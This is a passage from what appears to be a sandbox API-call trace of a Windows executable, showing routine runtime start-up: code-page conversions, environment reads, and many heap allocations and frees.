¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0188.655] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0188.655] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0188.655] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0188.655] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0188.655] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0188.655] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0188.655] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x1000) returned 0x5770c0 [0188.656] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0188.656] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0188.656] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0188.656] AreFileApisANSI () returned 1 [0188.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0188.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0188.656] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0xc4) returned 0x5643d0 [0188.656] GetEnvironmentStringsW () returned 0x5780d0* [0188.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0188.657] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x4e6) returned 0x578ab0 [0188.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x578ab0, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0188.657] FreeEnvironmentStringsW (penv=0x5780d0) returned 1 [0188.657] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x118) returned 0x569ea0 [0188.657] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x1f) returned 0x56b410 [0188.657] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x2e) returned 0x5698b0 [0188.657] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x31) returned 0x564b10 [0188.657] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x3c) returned 0x570970 [0188.657] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x31) returned 0x564b50 [0188.657] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x14) returned 0x564060 [0188.657] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x24) returned 0x56b980 [0188.657] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0xd) returned 0x569be0 [0188.657] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x1d) returned 0x56b560 [0188.657] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x31) returned 0x564b90 [0188.657] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x15) returned 0x564bd0 [0188.657] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x17) returned 0x5625e0 [0188.657] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0xe) returned 0x563e90 [0188.657] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x69) returned 0x563eb0 [0188.657] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x3e) returned 0x56ff20 [0188.657] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x1d) returned 0x56b590 [0188.657] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x48) returned 0x570e20 [0188.657] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x12) returned 0x563f30 [0188.658] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x18) returned 0x563f50 [0188.658] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x1b) returned 0x56b230 [0188.658] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x1e) returned 0x56b5c0 [0188.658] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x29) returned 0x5783a0 [0188.658] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x1e) returned 0x56b5f0 [0188.658] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x6b) returned 0x56b9f0 [0188.658] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x17) returned 0x56ba70 [0188.658] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0xf) returned 0x56ba90 [0188.658] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x16) returned 0x56bab0 [0188.658] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x2a) returned 0x5781a0 [0188.658] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x29) returned 0x5785a0 [0188.658] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x12) returned 0x5791b0 [0188.658] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x21) returned 0x56b7d0 [0188.658] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x16) returned 0x579250 [0188.658] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x22) returned 0x56b620 [0188.658] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x12) returned 0x579350 [0188.658] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x578ab0 | out: hHeap=0x560000) returned 1 [0188.659] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xa3a7) returned 0x5793b0 [0188.661] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x20) returned 0x56b260 [0188.661] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xa3a7) returned 0x583760 [0188.663] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5793b0 | out: hHeap=0x560000) returned 1 [0188.663] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xfef7) returned 0x58db10 [0188.678] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x40) returned 0x5707e0 [0188.678] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xfef7) returned 0x59da10 [0188.680] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56b260 | out: hHeap=0x560000) returned 1 [0188.680] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x58db10 | out: hHeap=0x560000) returned 1 [0188.681] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x450) returned 0x5788e0 [0188.681] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x450) returned 0x5ad910 [0188.681] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5788e0 | out: hHeap=0x560000) returned 1 [0188.681] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1ea7) returned 0x5add70 [0188.681] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xf40) returned 0x5793b0 [0188.682] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x7a0) returned 0x57a300 [0188.682] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5add70 | out: hHeap=0x560000) returned 1 [0188.682] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5793b0 | out: hHeap=0x560000) returned 1 [0188.683] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xbf0) returned 0x5793b0 [0188.683] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5ad910 | out: hHeap=0x560000) returned 1 [0188.683] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x57a300 | out: hHeap=0x560000) returned 1 [0188.683] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x640) returned 0x5788e0 [0188.683] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1247) returned 0x5ad910 [0188.683] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5793b0 | out: hHeap=0x560000) returned 1 [0188.683] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5788e0 | out: hHeap=0x560000) returned 1 [0188.683] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x520) returned 0x5788e0 [0188.683] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1b56) returned 0x5793b0 [0188.683] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5ad910 | out: hHeap=0x560000) returned 1 [0188.683] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5788e0 | out: hHeap=0x560000) returned 1 [0188.683] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8a0) returned 0x5ad910 [0188.683] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x28ed) returned 0x57af10 [0188.683] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5793b0 | out: hHeap=0x560000) returned 1 [0188.683] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5ad910 | out: hHeap=0x560000) returned 1 [0188.683] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x550) returned 0x5788e0 [0188.683] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5788e0 | out: hHeap=0x560000) returned 1 [0188.684] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2537) returned 0x5ad910 [0188.684] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x12b7) returned 0x5793b0 [0188.684] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x950) returned 0x57d810 [0188.684] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5ad910 | out: hHeap=0x560000) returned 1 [0188.684] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5793b0 | out: hHeap=0x560000) returned 1 [0188.684] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3d4f) returned 0x57e170 [0188.685] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x57af10 | out: hHeap=0x560000) returned 1 [0188.685] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x57d810 | out: hHeap=0x560000) returned 1 [0188.685] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2377) returned 0x5ad910 [0188.685] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x11d7) returned 0x581ed0 [0188.685] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8e0) returned 0x5793b0 [0188.686] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5ad910 | out: hHeap=0x560000) returned 1 [0188.686] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x581ed0 | out: hHeap=0x560000) returned 1 [0188.686] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5793b0 | out: hHeap=0x560000) returned 1 [0188.686] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5b0) returned 0x5788e0 [0188.686] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5788e0 | out: hHeap=0x560000) returned 1 [0188.686] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x640) returned 0x5788e0 [0188.686] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5be2) returned 0x58db10 [0188.687] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x57e170 | out: hHeap=0x560000) returned 1 [0188.687] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5788e0 | out: hHeap=0x560000) returned 1 [0188.687] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x890) returned 0x5ad910 [0188.687] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5ad910 | out: hHeap=0x560000) returned 1 [0188.687] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xac0) returned 0x5ad910 [0188.687] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5ad910 | out: hHeap=0x560000) returned 1 [0188.687] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x20) returned 0x56b800 [0188.687] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x960) returned 0x5ad910 [0188.687] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x960) returned 0x5ae280 [0188.687] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5ad910 | out: hHeap=0x560000) returned 1 [0188.688] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x460) returned 0x5788e0 [0188.688] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe0f) returned 0x5aebf0 [0188.688] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5ae280 | out: hHeap=0x560000) returned 1 [0188.688] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5788e0 | out: hHeap=0x560000) returned 1 [0188.688] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1c17) returned 0x593700 [0188.688] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe00) returned 0x5ad910 [0188.688] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x700) returned 0x595320 [0188.688] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x593700 | out: hHeap=0x560000) returned 1 [0188.688] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5ad910 | out: hHeap=0x560000) returned 1 [0188.688] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x153d) returned 0x593700 [0188.689] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5aebf0 | out: hHeap=0x560000) returned 1 [0188.689] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x595320 | out: hHeap=0x560000) returned 1 [0188.689] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2277) returned 0x5ad910 [0188.689] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1157) returned 0x594c50 [0188.689] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8a0) returned 0x595db0 [0188.690] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5ad910 | out: hHeap=0x560000) returned 1 [0188.690] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x594c50 | out: hHeap=0x560000) returned 1 [0188.690] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1fc7) returned 0x5ad910 [0188.690] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x593700 | out: hHeap=0x560000) returned 1 [0188.690] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x595db0 | out: hHeap=0x560000) returned 1 [0188.690] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1657) returned 0x593700 [0188.690] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xb20) returned 0x594d60 [0188.690] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x590) returned 0x5788e0 [0188.690] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x593700 | out: hHeap=0x560000) returned 1 [0188.690] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x594d60 | out: hHeap=0x560000) returned 1 [0188.690] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2f96) returned 0x593700 [0188.690] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5ad910 | out: hHeap=0x560000) returned 1 [0188.691] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5788e0 | out: hHeap=0x560000) returned 1 [0188.691] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2b47) returned 0x5966a0 [0188.691] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x15b7) returned 0x5ad910 [0188.692] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xad0) returned 0x5aeed0 [0188.693] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5966a0 | out: hHeap=0x560000) returned 1 [0188.693] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5ad910 | out: hHeap=0x560000) returned 1 [0188.693] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5aeed0 | out: hHeap=0x560000) returned 1 [0188.693] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2697) returned 0x5ad910 [0188.693] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1367) returned 0x5966a0 [0188.693] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9a0) returned 0x597a10 [0188.693] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5ad910 | out: hHeap=0x560000) returned 1 [0188.693] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5966a0 | out: hHeap=0x560000) returned 1 [0188.694] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x474d) returned 0x5983c0 [0188.694] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x593700 | out: hHeap=0x560000) returned 1 [0188.694] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x597a10 | out: hHeap=0x560000) returned 1 [0188.694] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x920) returned 0x59cb20 [0188.694] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x59cb20 | out: hHeap=0x560000) returned 1 [0188.694] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1b47) returned 0x5ad910 [0188.694] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd90) returned 0x59cb20 [0188.695] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6d0) returned 0x5af460 [0188.695] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5ad910 | out: hHeap=0x560000) returned 1 [0188.695] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x59cb20 | out: hHeap=0x560000) returned 1 [0188.695] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5af460 | out: hHeap=0x560000) returned 1 [0188.695] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5d0) returned 0x5788e0 [0188.695] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6adf) returned 0x5793b0 [0188.695] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5983c0 | out: hHeap=0x560000) returned 1 [0188.695] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5788e0 | out: hHeap=0x560000) returned 1 [0188.695] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1887) returned 0x5ad910 [0188.695] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc30) returned 0x5af1a0 [0188.695] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x620) returned 0x5788e0 [0188.695] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5ad910 | out: hHeap=0x560000) returned 1 [0188.695] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5af1a0 | out: hHeap=0x560000) returned 1 [0188.696] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5788e0 | out: hHeap=0x560000) returned 1 [0188.696] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8f0) returned 0x5ad910 [0188.696] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x480) returned 0x5788e0 [0188.696] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x240) returned 0x5ae210 [0188.696] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5ad910 | out: hHeap=0x560000) returned 1 [0188.696] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5788e0 | out: hHeap=0x560000) returned 1 [0188.696] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5ae210 | out: hHeap=0x560000) returned 1 [0188.696] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x40) returned 0x570060 [0188.696] HeapFree (in: hHeap=0x560000, dwFlags=0x0, 